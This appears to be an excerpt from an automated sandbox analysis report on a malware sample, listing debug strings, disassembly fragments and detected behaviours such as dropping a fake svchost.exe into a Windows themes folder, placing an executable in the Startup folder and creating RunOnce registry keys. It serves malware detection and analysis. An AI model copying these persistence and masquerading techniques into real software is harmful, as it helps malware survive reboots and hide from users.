                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb9C-4437-8B11-F424491E3931}\Server source: svchost.exe, 00000028.00000002.588815197.0000000007E00000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdbDriverData=C:\Windows\System32\Drivers\DriverData source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb(m source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbs source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbZS!'~< source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdbpdbtry.pdb_ source: VknMvPoCXZ.exe, 00000001.00000002.568888200.0000000000A84000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdbS source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb(m source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: o.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: VknMvPoCXZ.PDB source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: symbols\dll\System.Windows.Forms.pdbvs. source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: iHC:\Windows\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb25563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: svchost.exe, 00000028.00000002.588815197.0000000007E00000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdbease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdbM( source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: svchost.PDB source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_0040B550 push eax; ret 6_2_0040B564
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_0040B550 push eax; ret 6_2_0040B58C
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_0040B50D push ecx; ret 6_2_0040B51D
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret 7_2_0040B564
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret 7_2_0040B58C
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 7_2_0040B50D push ecx; ret 7_2_0040B51D
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_0040289F
                      Source: VknMvPoCXZ.exeStatic PE information: 0xDA8605A3 [Wed Mar 6 01:25:55 2086 UTC]

                      Persistence and Installation Behavior:

                      barindex
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: unknownExecutable created and started: C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe
                      Drops PE files with benign system namesShow sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeFile created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeFile created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeJump to dropped file
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Drops PE files to the startup folderShow sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeJump to dropped file
                      Creates autostart registry keys with suspicious namesShow sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404BJump to behavior
                      Creates an autostart registry key pointing to binary in C:\WindowsShow sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404BJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe\:Zone.Identifier:$DATAJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404BJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404BJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404BJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404BJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,6_2_00401306
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00408E31
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
